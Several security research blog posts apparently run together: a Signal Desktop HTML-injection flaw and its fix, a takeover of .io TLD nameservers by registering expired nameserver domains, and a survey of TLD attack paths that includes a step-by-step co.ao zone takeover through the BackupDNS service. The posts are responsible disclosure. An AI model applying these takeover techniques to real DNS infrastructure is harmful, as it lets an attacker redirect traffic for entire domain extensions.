Remediation TL;DR

If you’re a concerned Signal user, please update to the latest version of Signal Desktop (these issues were fixed in v1.11.0). Note that Signal’s mobile apps were not affected.

Background Information

If you’re an avid follower of all that is security-Twitter, then you’ve probably heard about the impressive finding of Remote Code Execution (RCE) via HTML markup injection in Signal Desktop by Iván Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and Juliano Rizzo (@julianor):

Shortly after seeing this tweet I wanted to validate whether the finding was real, so I played around with my own copy of Signal Desktop to see if I could reproduce the results. I had previously worked with @LittleJoeTables and @infosec_au on research into exploiting web-on-desktop apps, so I was fairly certain I knew what I was looking at. I began playing with the Signal Desktop app, trying to get arbitrary HTML markup to be evaluated, but it didn’t appear to be straightforward. After trying a few different fields (name, plain message, etc.) I eventually found that if you created a message containing HTML markup (say, <h1>Test</h1>) and then sent a Quoted Reply to that message, the original markup would be evaluated as HTML! I then posted on Twitter that I was able to reproduce the problem:

“Wait a Minute…”

However, something was not quite right. I later applied the Signal update and yet was still able to exploit the issue, so I assumed something was wrong with my install. I uninstalled Signal Desktop and didn’t think much of it until I later read the writeup done by the security researchers. Upon reading it I realized the researchers had been sending vanilla Signal messages which were being interpreted as HTML, not the Quoted Replies that I had been using. I messaged @HacKanCuBa on Twitter to discuss this oddity, and he tried my method on his copy of Signal Desktop only to find…the exploit still worked! As it turns out, these were two separate but very similar vulnerabilities with the same impact. Who could have guessed?

After this realization we quickly notified Signal of the issue. They had a patch out within hours, which was very impressive, and they even added extra mitigations to prevent the problem from recurring.

Vulnerability Root Cause

For the full writeup on the original vulnerability, see this article. Here we’ll dive into the root cause of my particular variant (CVE-2018-11101) and show how Signal fixed it.

The core of the vulnerability was in the use of React’s dangerouslySetInnerHTML in order to render the contents of a Quoted Reply message. The relevant code can be found in Quote.tsx and is the following:

  public renderText() {
    const { i18n, text, attachments } = this.props;

    if (text) {
      return (
        <div className="text" dangerouslySetInnerHTML={{ __html: text }} />
...trimmed for brevity...

To quote the React documentation itself:

dangerouslySetInnerHTML is React’s replacement for using innerHTML in the browser DOM. In general, setting HTML from code is risky because it’s easy to inadvertently expose your users to a cross-site scripting (XSS) attack. So, you can set HTML directly from React, but you have to type out dangerouslySetInnerHTML and pass an object with a __html key, to remind yourself that it’s dangerous.

Much like innerHTML, use of dangerouslySetInnerHTML is, well, dangerous, and can lead to XSS like what occurred in the Signal Desktop app. Here it allowed the quoted reply text to be evaluated as HTML, which served as the basis of this exploit.

Signal fixed this by removing the usage of dangerouslySetInnerHTML, along with further tightening the app’s Content Security Policy (CSP).
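Conceptually, the safe approach is to treat untrusted message text as text rather than markup. As a language-neutral illustration (a Python sketch of the general pattern, not Signal’s actual TypeScript fix), compare interpolating raw text into HTML with escaping it first:

```python
import html

def render_quote_unsafe(text):
    # Vulnerable pattern: untrusted text is interpolated directly into
    # markup, so a message like "<img src=x onerror=...>" becomes live HTML.
    return '<div class="text">%s</div>' % text

def render_quote_safe(text):
    # Escaping turns markup metacharacters into entities, so the browser
    # displays the payload as text instead of executing it.
    return '<div class="text">%s</div>' % html.escape(text)
```

React does this escaping automatically when you render text as children, which is why dropping dangerouslySetInnerHTML in favor of ordinary text rendering closes the hole.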

All said and done, this vulnerability was present in the Signal Desktop app for about three weeks (starting in v1.8.0) before being patched.

Going Forward

Thanks to some help from my friends @aegarbutt and @LittleJoeTables we were able to compile a list of strategic defense-in-depth recommendations for Signal Desktop which we’ve sent to the Signal security team per their request. At the end of the day there will always be new “hot” vulnerabilities, but the “vendor” response is generally what separates the wheat from the chaff. The Signal team’s quick patch time along with a strong interest in mitigating vulnerabilities of this type in the future was encouraging to see. I’ll remain a Signal user for the foreseeable future :)

Exploit Video


  • 4:31 PM – May 11, 2018 PST – Discovery of exploit, though I originally mistook it for a duplicate
  • ~3:30 PM – May 14, 2018 PST – Realization that the exploit works against the latest version of Signal
  • 3:57 PM – May 14, 2018 PST – Vulnerability disclosed to Signal Security
  • 4:21 PM – May 14, 2018 PST – Signal requests 24 hours before disclosure to ensure users patch; states a patch will be out in 2–3 hours
  • ~5:47 PM – May 14, 2018 PST – Patch pushed to all Signal Desktop users


Special thanks to the following folks:


In a previous post we talked about taking over the .na,, and domain extensions with varying levels of DNS trickery. In that writeup we examined the threat model of compromising a top level domain (TLD) and what some avenues for an attacker to accomplish this goal would look like. One of the fairly simple methods brought up was to register the domain name of one of the TLD’s authoritative nameservers. Since a TLD can have authoritative nameservers at arbitrary domain names, it’s possible that, through a misconfiguration, expiration, or some other issue, someone could register a nameserver domain name and use it to serve new DNS records for the entire TLD zone. I’ll include the relevant quote from the previous post here:

This avenue was something I was fairly sure was going to be the route to victory, so I spent quite a lot of time building out tooling to check for vulnerabilities of this type. The process is essentially to enumerate all nameserver hostnames for a given extension and then check whether any of the base domains are expired and available for registration. The main issue I ran into is that many registries will tell you a domain is totally available until you actually attempt to purchase it. Additionally, there were a few instances where a nameserver domain was expired but, for some reason, still unavailable for registration despite not being marked as reserved. This scanning led to the enumeration of many domain takeovers under restricted TLD/domain extension space (.gov, .edu, .int, etc.) but none in the actual TLD/domain extensions themselves.

As it turns out, this method was not only a plausible way to attack a TLD, it actually led to the compromise of the biggest TLD yet.

The .io Anomaly

While graphing out the DNS delegation paths of various TLDs late on a Friday night I noticed a script I had written was giving me some unexpected results for the .io TLD:

[Image: io._trust_tree_graph]

One of the features of this script (called TrustTrees) is that you can pass it a Gandi API key and it will check whether any of the nameservers in the delegation chain have a domain name that’s available for registration. It appeared that Gandi’s API was reporting that multiple .io nameserver domains were available for purchase! This does not necessarily mean you can actually register these domain names, however; in the past I had seen multiple incidents where a registry would state a domain name was available but wouldn’t allow the actual registration to go through because the name was “reserved”. I decided to go straight to the source and check the registry’s website at NIC.IO to see if this was true. After a quick search for the nameserver domain ns-a1.io I was surprised to find that the registry’s website confirmed this domain was available for the registration price of 90.00 USD. Given that it was around midnight I decided to go ahead and attempt to purchase the domain to see if it would actually go through. Shortly afterwards I received an email confirming that my domain name registration was “being processed”:

[Image: ns-a1.io_domain_purchase_confirmation_receipt]

It’s not clear why I received a confirmation from 101Domain, but apparently .io’s registrations (and possibly their entire registry?) are managed via this company. Since it was well past midnight at this point I shrugged it off and eventually forgot about the registration until the following Wednesday morning, when I got the following notification as I was walking out the door to go to work:

[Image: ns-a1.io_domain_activated_email]

At this point I was instantly reminded of the details of that registration, and I turned around to check whether I had actually just gained control over one of .io’s nameservers. I ran a quick dig command for the domain and, sure enough, my test DNS nameservers (ns1/ were listed for ns-a1.io:

bash-3.2$ dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8052
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

;          IN  NS

;; ANSWER SECTION:       86399   IN  NS       86399   IN  NS

;; Query time: 4 msec
;; SERVER: 2604:5500:16:32f9:6238:e0ff:feb2:e7f8#53(2604:5500:16:32f9:6238:e0ff:feb2:e7f8)
;; WHEN: Wed Jul  5 08:46:44 2017
;; MSG SIZE  rcvd: 84


I queried one of the root DNS servers to again confirm that this domain was listed as one of the authoritative nameservers for the .io TLD and sure enough, it definitely was:

bash-3.2$ dig NS io.

; <<>> DiG 9.8.3-P1 <<>> NS io.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19611
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 7, ADDITIONAL: 12
;; WARNING: recursion requested but not available

;io.                IN  NS

io.         172800  IN  NS
io.         172800  IN  NS
io.         172800  IN  NS
io.         172800  IN  NS
io.         172800  IN  NS
io.         172800  IN  NS
io.         172800  IN  NS

;; ADDITIONAL SECTION:       172800  IN  AAAA    2001:678:4::1       172800  IN  AAAA    2001:678:5::1      172800  IN  AAAA    2a01:8840:9e::17      172800  IN  AAAA    2a01:8840:9f::17      172800  IN  AAAA    2a01:8840:a0::17       172800  IN  A       172800  IN  A       172800  IN  A       172800  IN  A      172800  IN  A      172800  IN  A      172800  IN  A

;; Query time: 70 msec
;; SERVER: 2001:7fd::1#53(2001:7fd::1)
;; WHEN: Wed Jul  5 08:46:14 2017
;; MSG SIZE  rcvd: 407

Yikes! I quickly SSHed into the DNS testing server that was now hosting this domain and killed the BIND server that was running on it. If I was starting to receive DNS traffic I certainly didn’t want to serve up bad responses to people legitimately trying to access their .io domain names. With the BIND server no longer responding to queries on port 53, all DNS queries would automatically fail over to the TLD’s other nameservers, so traffic wouldn’t be greatly affected (other than a slight delay in resolution time while DNS clients failed over to working nameservers). To see whether I was actually receiving traffic I ran a quick tcpdump of all DNS traffic to a file to see just how many queries I was getting. I immediately saw hundreds of queries being verbosely printed to my terminal from random IP addresses across the Internet. It looked like I was definitely serving up traffic for the entire .io TLD, and worse yet, this was likely only the beginning, since many DNS clients were still operating on cached DNS records which would expire shortly.

Reporting a Security Issue in a TLD

With my server no longer responding to any DNS queries, my mind was set on getting this fixed as quickly as possible. My main concern was that multiple other nameserver domains were still available for registration, and that could be done by anyone with the money and the knowledge to do so. I looked up the contacts for the .io TLD in IANA’s root database:


I then wrote up a summary of the issue, emailed both contacts about the problem, and conveyed the urgency of a fix. I stated my concern about the other TLD nameserver domains being available for registration and said that if I didn’t receive a response within a few hours I would go ahead and register those as well to protect the TLD. After sending the email I immediately received a bounce message indicating that the [email protected] address did not exist at all:

[Image: email_bounce]

This was not a strong vote of confidence that someone was going to see this notice. I decided to take action and just spend the money to buy the other nameserver domains, to prevent anyone else from hijacking the TLD. Just like with the first domain, I explicitly set my DNS server not to respond to inbound queries so that it wouldn’t interfere with regular .io traffic. Those domain orders were actually filled quite quickly:

[Image: securing_other_nameservers]

Phew. At the very least this could no longer be exploited by any random attacker, and I was able to head to work with much less worry.

Later that day I called NIC.IO’s support phone number and requested the appropriate email to contact any security personnel/team they had for the TLD. The agent assured me that [email protected] was the appropriate contact for this issue (which I double-checked, just to be sure). While it seemed unlikely to be the correct contact, I forwarded the report to that email address as well, hoping that at the very least the abuse department would forward it to the appropriate place. With few further leads for reaching an appropriate security contact, I waited for a response.

“Oops” – Remediation via Revoked Domains

Around noon the following day I received a blast of notifications from 101Domain stating that my domain privacy had been deactivated, my “support ticket” had been answered, and all of my domains had been revoked by the registry:

[Image: 101domain_email_blast]

Looks like, shockingly enough, the [email protected] alias was the correct email address for the issue after all. After logging into my 101Domain account I found the following message from the 101Domain legal department:

[Image: 101domain_oops_deleted_io_ns]

All said and done, this was actually an excellent response time (though usually I just get a “fixed it” response via email instead of a Legal Department notice). After verifying that I was not able to re-register these domains, it would appear that this had been completely remediated.


Given that we were able to take over four of the seven authoritative nameservers for the .io TLD, we would have been able to poison/redirect the DNS for all registered .io domain names. Not only that: since we controlled a majority of the nameservers, clients would actually be more likely to randomly select our hijacked nameservers than any of the legitimate ones, even before employing tricks like long-TTL responses to further tilt the odds in our favor. Even assuming an immediate response to a large-scale redirection of all .io domain names, it would take some time for the cached records to fall out of the world’s DNS resolvers.
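To put numbers on that “majority” point (a simplified model, assuming a resolver that picks uniformly at random among the seven listed NS records, with no TTL tricks applied):

```python
from fractions import Fraction

CONTROLLED = 4  # .io nameserver domains we registered
TOTAL = 7       # authoritative nameservers listed for .io

# Probability that a single uniform random pick among the NS set
# lands on a hijacked nameserver.
p_hijacked = Fraction(CONTROLLED, TOTAL)
```

Under that assumption a bit over half of all first-try queries for .io would have landed on servers we controlled.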

One mitigating factor that should be mentioned is that the .io TLD has DNSSEC enabled. This means that if your resolver supports it you should be defended from an attacker sending bad/forged DNS data in the way mentioned above. That being said, as mentioned in a previous post DNSSEC support is pretty abysmal and I rarely encounter any support for it unless I specifically set a resolver up that supports it myself.

*As an unrelated aside, it’s important to remember to kill tcpdump after you’ve started it. Not doing that is a great way to obliterate your VPS disk space with DNS data, which was an unexpected additional impact of this :). Please note that any DNS data recorded for debugging purposes has now been purged for the privacy of the users of the .io TLD/its domains.

Mitigations and TLD Security

I’ve already written at some length about how some of these issues could be mitigated from a TLD perspective (see Conclusions & Final Thoughts of the post The Journey to Hijacking a Country’s TLD – The Hidden Risks of Domain Extensions for more info on this). In the future I hope to publish a more extensive guide on how TLDs and domain extension operators can better monitor and prevent issues like this from occurring.


I promised a friend of mine that I would do a silly old-school hacker shout-out in my next blog post, so I’m fulfilling that obligation here :) Special thanks to the following folks for both moral and “immoral” support (as phrased by the one and only HackerBadger).

Greetz to HackerBadger, EngSec (y’all know who you are), and the creator of the marquee tag. Hack the planet, the gibson, etc.

I will liken him to a wise man, who built his house on a rock. The rain came down, the floods came, and the winds blew, and beat on that house; and it didn’t fall, for it was founded on the rock. Everyone who hears these words of mine, and doesn’t do them will be like a foolish man, who built his house on the sand. The rain came down, the floods came, and the winds blew, and beat on that house; and it fell—and great was its fall.

The Parable of the Wise and Foolish Builders

Domain names are the foundation of the Internet that we all enjoy. However, despite the number of people who use them, very few understand how they work behind the scenes. Thanks to many layers of abstraction and various web services, many people can own a domain and set up an entire website without knowing anything about DNS, registrars, or even WHOIS. While this abstraction has a lot of very positive benefits, it also masks a lot of important information from the end customer. For example, many registrars are more than happy to advertise a .io domain name to you, but how many .io owners actually know who owns and regulates .io domains? I don’t think it’s a large stretch to say that most domain owners know little to nothing about the entities behind their domain name. The question that is asked even less often is “What is this domain extension’s track record for security?”.

A Quick Introduction to the DNS Structure

Feel free to skip this section if you already know how DNS works and is delegated.

So what are you buying when you purchase a domain name? At its core, you’re simply buying a few NS (nameserver) records which will be hosted on the extension’s nameservers (this of course excludes secondary services such as WHOIS, registry/registrar operational costs, and other fees which go to ICANN). To better understand an extension’s place in the chain of DNS, we’ll take a look at a graph of example.com’s delegation chain. I’ve personally found that visualization is very beneficial when it comes to understanding how DNS operates, so I’ve written a tool called TrustTrees which builds a graph of the delegation paths for a domain name:

[Image: example.com_trust_tree_graph]

The above graph shows the delegation chain starting at the root level DNS servers. For those unfamiliar with the DNS delegation process, it works via a continual chain of referrals until the target nameserver has been found. A client looking for the answer to a DNS query starts at the root level, querying one of the root nameservers. The roots likely don’t know the answer and will delegate the query to a TLD, which in turn delegates it to the appropriate nameservers, and so on until an authoritative answer has been received, confirming that the response came from a nameserver responsible for the zone. The above graph shows all of the possible delegation paths which could take place (blue indicates an authoritative answer). There are many paths because DNS responses contain lists of answers in an intentionally random order (a technique known as round-robin DNS) in order to provide load balancing for queries. Depending on the order of the results returned, different nameservers may be queried for an answer, and thus they may provide different results altogether. The graph shows all of these permutations and the relationships between the nameservers.
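To make the round-robin behavior concrete, here is a small Python sketch (illustrative only; real resolvers implement this logic internally, and the nameserver names are hypothetical) of a client choosing among equally weighted NS records:

```python
import random

# Hypothetical NS record set for some zone
nameservers = ["ns1.example.net", "ns2.example.net", "ns3.example.net"]

def pick_nameserver(ns_records, rng=random):
    """Simulate a resolver's choice: with answers returned in a
    rotated/random order, each listed nameserver is equally likely
    to be the one tried first."""
    shuffled = list(ns_records)
    rng.shuffle(shuffled)
    return shuffled[0]
```

Over many queries every listed nameserver ends up being selected, which is why controlling even a subset of a zone’s nameservers earns you a proportional share of its traffic.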

So, as discussed above, if you bought example.com the .com registry would add a few NS records to its DNS zone which would delegate any DNS queries for example.com to the nameservers you provided. This delegation to your nameservers is what really gives you control over the domain name and the ability to make arbitrary sub-domains and DNS records for example.com. If the organization that owns .com decided to remove the nameserver (NS) records delegating to your nameservers, then nobody would ever reach your nameservers and example.com would cease to work at all.
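In zone-file terms, that delegation is nothing more than a couple of records in the parent zone. A hypothetical fragment (made-up nameserver names, not the real .com zone data) would look like:

```
;; In the .com zone: delegate example.com to the owner's nameservers
example.com.        172800  IN  NS  ns1.example-dns.net.
example.com.        172800  IN  NS  ns2.example-dns.net.
```

Delete those NS records and resolvers can no longer find the domain’s nameservers, which is exactly the failure mode described above.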

Taking this up a step in the chain, you can think of TLDs and domain extensions in much the same way as any other domain name. TLDs only exist and can operate because the root nameservers delegate queries for them to the TLD’s nameservers. If the root nameservers suddenly removed the .com NS records from their zone, then all .com domain names would be in a world of trouble and would essentially cease to exist.

Just Like Domain Names, Domain Name Extensions Can Suffer From Nameserver Vulnerabilities

Now that we understand that TLDs and domain extensions have nameservers just like regular domain names, one question that comes up is “Does that mean TLDs and domain extensions can suffer from DNS security issues like domain names do?”. The answer, of course, is yes. If you’ve read some of the past posts on this blog, you know that we can hijack nameservers in a variety of ways. We’ve shown how an expired or typo-ed nameserver domain name can lead to hijacking, and we’ve also seen how many hosted DNS providers allow control over a domain’s zone to be gained without any verification of ownership. Taking the lessons we’ve learned from these explorations, we can apply the same knowledge to attempt a much more grandiose feat: taking over an entire domain extension.

The Mission to Take Over a Domain Extension – The Plan of Attack

Unlike a malicious actor, I’m unwilling to take many of the actions which would likely allow you to quickly achieve the goal of hijacking a domain extension. Along the course of researching methods for attacking domain extensions, I found that many extension/TLD nameservers and registries are in an abysmal state to begin with, so exploiting and gaining control over one is actually much easier than many would think. Although I consider tactics like obtaining remote code execution on a registry or nameserver to be out of scope, I will still mention them as a viable route to success, since real-world actors will likely have little regard for ethics.

Generally speaking, the following are some ways that I came up with for compromising a TLD/domain extension:

  • Exploiting a vulnerability in the DNS server which hosts a given domain extension, or in any other service hosted on an extension’s nameservers. Attacking registries also falls into this category, as they have the ability to update these zones as part of normal operation.
  • Finding and registering an expired or typo-ed nameserver domain which is authoritative for a domain extension/TLD.
  • Hijacking the domain extension by recreating a DNS zone in a hosted DNS provider which no longer has the extension’s zone hosted there.
  • Hijacking the email addresses associated with a TLD’s WHOIS contact information (as listed in the IANA root zone database).

We’ll go over each of these and talk about some of the results found while investigating these avenues as possible routes to our goal.

Vulnerable TLD & Domain Extension Nameservers Are Actually Quite Common

To begin researching the first method of attack, I decided to do a simple port scan of all of the TLD nameservers. In a perfect world you would see a list of servers listening on UDP/TCP port 53 with all other ports closed. Given the powerful position of these nameservers, it is important that they expose as little surface area as possible. Any additional service exposed, such as HTTP, SSH, or SMTP, is another pathway for an attacker to exploit in order to compromise the given TLD/domain extension.

This section is a bit awkward because I want to outline how dire the situation is without encouraging any malicious activity. During the course of this investigation there were a few situations where simply browsing things like websites hosted on the TLD nameservers led to strong indicators of both exploitability and in some cases even previous compromise. I will be omitting these and focusing only on some key examples to demonstrate the point.


The finger protocol was written in 1971 by Les Earnest to allow users to check the status of a user on a remote computer. It is an incredibly old protocol which is no longer used on any modern systems. The idea of the protocol is essentially to answer the question “Hey, is Dave at his machine right now? Is he busy?”. With finger you can look up a remote user’s login name, real name, terminal name, idle time, login time, office location, and office phone number. As an example, we’ll finger one of the authoritative nameservers for the country of Bosnia and see what the root user is up to:

bash-3.2$ finger -l [email protected]
Login: root                       Name: Charlie Root
Directory: /root                        Shell: /bin/sh
Last login Sat Dec 14 16:41 2013 (ICT) on console
No Mail.
No Plan.

Looks like root has been away for a long time! Let’s take a look at one of the nameservers for Vietnam:

bash-3.2$ finger -l [email protected]
Login name: nobody                In real life: NFS Anonymous Access User
Directory: /                        
Never logged in.
No unread mail
No Plan.

Login name: noaccess              In real life: No Access User
Directory: /                        
Never logged in.
No unread mail
No Plan.

Login name: nobody4               In real life: SunOS 4.x NFS Anonymous Access User
Directory: /                        
Never logged in.
No unread mail
No Plan.

Login name: named                 In real life: User run named
Directory: /home/named                  Shell: /bin/false
Never logged in.
No unread mail
No Plan.
bash-3.2$ finger -l [email protected]
Login name: root                  In real life: Super-User
Directory: /                            Shell: /sbin/sh
Last login Tue Sep 30, 2014 on pts/1 from DNS-E
No unread mail
No Plan.

This one is more recent, with a last login date for root of September 30, 2014. The fact that this protocol is installed on these nameservers at all is a good indicator of just how old these servers are.
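For reference, the protocol behind those transcripts is trivially simple: the client opens TCP port 79 and sends a single query line (RFC 1288). A minimal sketch roughly equivalent to `finger -l user@host` (helper names are mine):

```python
import socket

def finger_query(user):
    """Build the RFC 1288 request line; the /W token asks for the
    verbose output that `finger -l` displays."""
    return ("/W %s\r\n" % user).encode("ascii")

def finger(host, user="root", timeout=10):
    """Connect to TCP/79, send the query, and read until the server closes."""
    with socket.create_connection((host, 79), timeout=timeout) as sock:
        sock.sendall(finger_query(user))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")
```

A protocol this simple, exposed on a TLD nameserver, is pure reconnaissance value for an attacker.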

Dynamic Websites


Probably the most common open nameserver port next to 53 was port 80 (HTTP). Some of the most interesting results came from simply visiting these websites. For example, one nameserver simply redirected me to an ad network:

* Rebuilt URL to:
*   Trying
* Connected to ( port 80 (#0)
> GET / HTTP/1.1
> Host:
> Accept: */*
> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
< HTTP/1.1 302 Moved Temporarily
< Server: nginx/1.10.1
< Date: Sun, 04 Jun 2017 03:16:30 GMT
< Content-Type: text/html
< Transfer-Encoding: chunked
< Connection: close
< X-Powered-By: PHP/5.3.3
< Location:
* Closing connection 0

I’m still unsure if this was a compromised nameserver or if the owner was just trying to make some extra money off of sketchy ads.

Other nameservers (such as one of the Albania nameservers for,,,, and returned various configuration pages which print verbose information about the machine they run on:

phpinfo_al.com_al.govThe party wouldn’t be complete without the ability to run command-line utilities on the remote server (nameserver for .ke, .ba, and a handful of other extensions):

[Image: run_those_commands_bro]

And much much more…


Additionally, there are many other fun services which I won’t go into much detail on, for brevity. SMTP, IMAP, MySQL, SNMP, and RDP are all far from uncommon ports to find open on various domain extension nameservers. Given the large attack surface of these services, I would rate the chances of this route succeeding very highly; however, we won’t engage in any further testing, given that we don’t want to act maliciously. Sadly, due to the sheer number of nameservers running outdated and insecure software, responsible disclosure to all owners would likely be an endless endeavor.

Checking for Expired TLD & Extension Nameserver Domain Names

This avenue was something I was fairly sure was going to be the route to victory, so I spent quite a lot of time building out tooling to check for vulnerabilities of this type. The process is essentially to enumerate all nameserver hostnames for a given extension and then check whether any of the base domains are expired and available for registration. The main issue I ran into is that many registries will tell you a domain is totally available until you actually attempt to purchase it. Additionally, there were a few instances where a nameserver domain was expired but, for some reason, still unavailable for registration despite not being marked as reserved. This scanning led to the enumeration of many domain takeovers under restricted TLD/domain extension space (.gov, .edu, .int, etc.) but none in the actual TLD/domain extensions themselves.
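The enumeration step can be sketched roughly as follows (a simplified illustration with function names of my own; the naive “last two labels” rule is wrong for extensions like .co.uk, so real tooling must consult the public suffix list):

```python
def base_domain(hostname):
    """Naive base-domain extraction: keep the last two labels.
    Real tooling must use the public suffix list, since e.g.
    ns1.foo.co.uk's registrable domain is foo.co.uk, not co.uk."""
    labels = hostname.rstrip(".").split(".")
    return ".".join(labels[-2:])

def candidate_domains(nameserver_hostnames):
    """Deduplicated base domains to then check for expiry/availability."""
    return sorted({base_domain(ns) for ns in nameserver_hostnames})
```

Each candidate base domain is then checked against the registry, keeping in mind the caveat above that “available” often really means “maybe”.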

Examining Hosted TLD & Extension Nameservers for DNS Errors

One useful technique for finding vulnerabilities (even ones you didn’t know existed) is to scan for general DNS errors and misconfigurations and investigate the anomalies you find. One useful tool for this is ZoneMaster, a general DNS configuration scanner with an extensive set of tests for nameserver/DNS misconfigurations. I tackled this approach by simply scripting up ZoneMaster scans for all of the domain extensions listed in the public suffix list. Poring over and grepping through the results led to some pretty interesting findings. One is covered in a previous blog post (in Guatemala’s TLD, .gt) and another is shown below.
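Driving ZoneMaster this way meant first pulling the list of extensions out of the public suffix list, whose format is simply one rule per line with `//` comments. A rough sketch of that parsing step (helper name is mine):

```python
def extension_entries(psl_text):
    """Extract extension rules from public-suffix-list text:
    one rule per line, skipping blank lines and // comments."""
    entries = []
    for raw in psl_text.splitlines():
        line = raw.strip()
        if line and not line.startswith("//"):
            entries.append(line)
    return entries
```

Each resulting entry can then be fed to the scanner as a zone to test.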

Striking Paydirt – Finding Vulnerabilities Amongst the Errors

After scripting the ZoneMaster tool to automate scanning all of the TLD/domain extensions in the public suffix list, I found one particularly interesting result. When scanning over the results I found that one of the nameservers for the extension was serving a DNS REFUSED error code when asked for the nameservers of the zone:

[Image: dns_refused_co_ao]

A quick verification with dig confirmed that this was indeed the case:

$ dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 21693
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;                IN    NS

;; Query time: 89 msec
;; WHEN: Thu Feb  9 21:57:35 2017
;; MSG SIZE  rcvd: 23

The nameserver in question appeared to be run by a third-party DNS hosting service called BackupDNS:

[Image: backupdns_homepage]

After some examination, the site appeared to be a fairly aged DNS hosting service with an emphasis on hosting backup DNS servers in case of a failure on the primary nameserver. What piqued my interest was the DNS error code REFUSED, which is often returned when a nameserver simply does not have a zone stored for the specified domain (in this case the zone). This is often dangerous because hosted DNS providers will frequently allow DNS zones to be set up by any account with no verification of domain name ownership, meaning that anyone could create an account and a zone for and potentially serve entirely new records.
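The heuristic that flagged this finding can be stated in a few lines (my own simplification of the check, using rcode names from RFC 1035):

```python
# DNS response codes relevant to this check (RFC 1035 names)
RCODES = {0: "NOERROR", 2: "SERVFAIL", 3: "NXDOMAIN", 5: "REFUSED"}

def takeover_candidate(rcode, delegated):
    """A nameserver that the parent zone delegates to, but which answers
    REFUSED for the zone itself, usually has no zone configured for it.
    On a multi-tenant DNS host, that can mean anyone may claim the zone."""
    return delegated and RCODES.get(rcode) == "REFUSED"
```

A REFUSED answer alone proves nothing; it only becomes interesting when the refusing server is actually listed in the parent’s delegation, as it was here.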

Interested in seeing if this was possible, I created an account on the website and turned to their documentation page:

[Image: backupdns_documentation]

Given the name of the site, the setup instructions made sense. In order to create a zone for, I first had to add the zone to my account via the domain management panel:

[Screenshot: adding the zone to my account]

This worked without any verification, but there was still no zone data loaded for that particular zone. The next step was to set up a BIND server on a remote host and configure it as an authoritative nameserver for the zone. Additionally, the server had to be configured to allow zone transfers from the BackupDNS nameserver so that the zone data could be copied over. The following diagrams show this process in action:

[Diagram: zone transfer, step 1]

We start with our master DNS server (in this case a BIND server set up in AWS) and the target BackupDNS nameserver we want our zone to be copied into.

[Diagram: zone transfer, step 2]

On a regular interval the BackupDNS nameserver will issue a zone transfer request (the AXFR DNS query). This is basically the nameserver asking, "Can I have a copy of all the DNS data you have for this zone?"

[Diagram: zone transfer, step 3]

Since we've configured our master nameserver to allow zone transfers from the BackupDNS nameserver via the allow-transfer configuration in BIND, the request is granted and the zone data is copied over. We have now created the proper zone in the BackupDNS service!
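For reference, the master side of this setup is only a few lines of BIND configuration. The snippet below is a sketch: the zone name is the extension from this section's scan, while the IP address, file path, and BackupDNS server address are placeholders.

```conf
// named.conf fragment on our master (AWS) BIND server -- placeholder values
zone "co.ao" {
    type master;
    file "/etc/bind/db.co.ao";        // our crafted zone data
    allow-transfer {; };   // placeholder: the BackupDNS server's IP
    also-notify {; };      // send a NOTIFY when the zone changes
};
```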

Ok, so I'd like to pause for just a moment and point out that at this point, I really wasn't thinking that this would work. This wasn't the first time I'd tested for issues like this with various nameservers, and previous attempts had ended unsuccessfully. That said, just in case it did work, the zone I copied over was intentionally built with records that had a TTL of 1 second and an SOA record with a TTL of only 60 seconds. This meant the records would be quickly thrown out of caches and the DNS request would be remade shortly afterwards to a legitimate nameserver for the extension. If you ever undertake testing of this nature I highly recommend you do the same in order to minimize the caching of bad DNS responses by people trying to access the target legitimately.

It, of course, did work, and the BackupDNS nameserver immediately began serving DNS traffic for After I saw the service confirm the copy I did a quick query with dig to verify:

$ dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 37564
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;              IN    NS

;; AUTHORITY SECTION:    60    IN    SOA 147297980 900 900 1800 60

;; Query time: 81 msec
;; WHEN: Sun Feb 12 23:13:50 2017
;; MSG SIZE  rcvd: 83

Uh oh, that's not good. I had originally placed a few NS records in the BIND zone file with the intention of delegating DNS queries back to the legitimate nameservers, but I screwed up the BIND config and, instead of replying with a DNS referral, the server replied with an authoritative answer of NXDOMAIN. This is obviously not great, so I quickly deleted the zone from the BackupDNS service. Due to some annoying caching behavior on the BackupDNS service this took a few minutes longer than I would've liked, but soon enough the service was again returning REFUSED for all queries for Luckily this all took place at ~3:00 AM Angola time, which, combined with the long TTL for the TLD, likely meant that very few users were actually impacted by the event (if any).


Despite the road bump, this confirmed that the extension was indeed vulnerable. I then turned back to the scan results I had collected and found that was not the only vulnerable extension: another Angolan domain extension commonly used by out-of-country entities was affected as well, along with domains belonging to the organization that runs these extensions.

Given the large impact that could occur if these extensions were hijacked maliciously, I decided to block other users from being able to add these zones to their own BackupDNS accounts. I added all the extensions to my own account but did not create any zone data for them; this ensured queries still returned the regular DNS errors with no results while preventing further exploitation:

[Screenshot: the zones held under my BackupDNS account]

After preventing immediate exploitation I then attempted to reach out to the owners of the affected extensions. For more information on the disclosure process please see "Responsible Disclosure Timeline" below.

Hijacking a TLD – Compromising the .na TLD via WHOIS

While hijacking a nameserver for a domain extension is pretty useful for exploitation, there is a higher level of compromise that TLDs specifically can suffer from. Ownership of a TLD is defined by the contacts listed on the WHOIS record in the IANA Root Zone Database. As an attacker, our main interest would be in getting the nameservers switched over to our own malicious nameservers so that we can serve up alternative DNS records for the TLD. IANA has a procedure for initiating this change for ccTLDs which can be found here. The important excerpt is the following:

